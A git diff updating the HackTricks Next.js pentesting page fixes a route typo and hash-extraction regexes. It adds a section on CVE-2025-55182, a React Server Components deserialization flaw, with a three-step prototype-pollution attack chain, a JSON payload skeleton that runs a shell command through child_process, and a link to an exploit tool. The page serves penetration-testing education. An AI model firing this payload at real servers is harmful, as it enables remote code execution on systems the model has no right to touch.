Merge pull request #1636 from HackTricks-wiki/update_CVE-2025-55182_React_Server_Components_Remote_Code_20251205_124129

CVE-2025-55182 React Server Components Remote Code Execution...

Author: carlospolop

src/network-services-pentesting/pentesting-web/nextjs.md

@@ -268,7 +268,7 @@ Catch-all routes handle multiple nested segments or unknown paths, providing fle
 ```arduino
 my-nextjs-app/
 ├── app/
-│   ├── [..slug]/
+│   ├── [...slug]/
 │   │   └── page.tsx
 │   ├── layout.tsx
 │   └── page.tsx
@@ -1285,10 +1285,10 @@ Search downloaded JS chunks for `createServerReference` and extract the hash and
 
 ```regex
 # Strict pattern for standard minification
-createServerReference\)\"([a-f0-9]{40,})\",\w+\.callServer,void 0,\w+\.findSourceMapURL,\"([^\"]+)\"\)
+createServerReference\)"([a-f0-9]{40,})",\w+\.callServer,void 0,\w+\.findSourceMapURL,"([^"]+)"\)
 
 # Flexible pattern handling various minification styles
-createServerReference[^\"]*\"([a-f0-9]{40,})\"[^\"]*\"([^\"]+)\"\s*\)
+createServerReference[^\"]*"([a-f0-9]{40,})"[^\"]*"([^"]+)"\s*\)
 ```
 
 - Group 1: server action hash (40+ hex chars)
@@ -1332,9 +1332,40 @@ Replay in Repeater and test authorization, input validation and business logic o
 - Requires `productionBrowserSourceMaps` enabled in production to recover names from bundles/source maps.
 - Function-name disclosure is not a vulnerability by itself; use it to guide discovery and test each action’s authorization.
 
+### React Server Components Flight protocol deserialization RCE (CVE-2025-55182)
+
+Next.js App Router deployments that expose Server Actions on `react-server-dom-webpack` **19.0.0–19.2.0 (Next.js 15.x/16.x)** contain a critical server-side prototype pollution during **Flight** chunk deserialization. By crafting `$` references inside a Flight payload an attacker can pivot from polluted prototypes to arbitrary JavaScript execution and then to OS command execution inside the Node.js process.
+
+{{#ref}}
+../../pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+{{#endref}}
+
+#### Attack chain in Flight chunks
+
+1. **Prototype pollution primitive:** Set `"then": "$1:__proto__:then"` so that the resolver writes a `then` function on `Object.prototype`. Any plain object processed afterwards becomes a thenable, letting the attacker influence async control flow inside RSC internals.
+2. **Rebinding to the global `Function` constructor:** Point `_response._formData.get` at `"$1:constructor:constructor"`. During resolution, `object.constructor` → `Object`, and `Object.constructor` → `Function`, so future calls to `_formData.get()` actually execute `Function(...)`.
+3. **Code execution via `_prefix`:** Place JavaScript source in `_response._prefix`. When the polluted `_formData.get` is invoked, the framework evaluates `Function(_prefix)(...)`, so the injected JS can run `require('child_process').exec()` or any other Node primitive.
+
+#### Payload skeleton
+
+```json
+{
+  "then": "$1:__proto__:then",
+  "status": "resolved_model",
+  "reason": -1,
+  "value": "{\"then\":\"$B1337\"}",
+  "_response": {
+    "_prefix": "require('child_process').exec('id')",
+    "_chunks": "$Q2",
+    "_formData": { "get": "$1:constructor:constructor" }
+  }
+}
+```
+
 ## References
 
 - [Pentesting Next.js Server Actions — A Burp Extension for Hash-to-Function Mapping](https://www.adversis.io/blogs/pentesting-next-js-server-actions)
 - [NextjsServerActionAnalyzer (Burp extension)](https://github.com/Adversis/NextjsServerActionAnalyzer)
+- [CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool](https://github.com/Spritualkb/CVE-2025-55182-exp)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}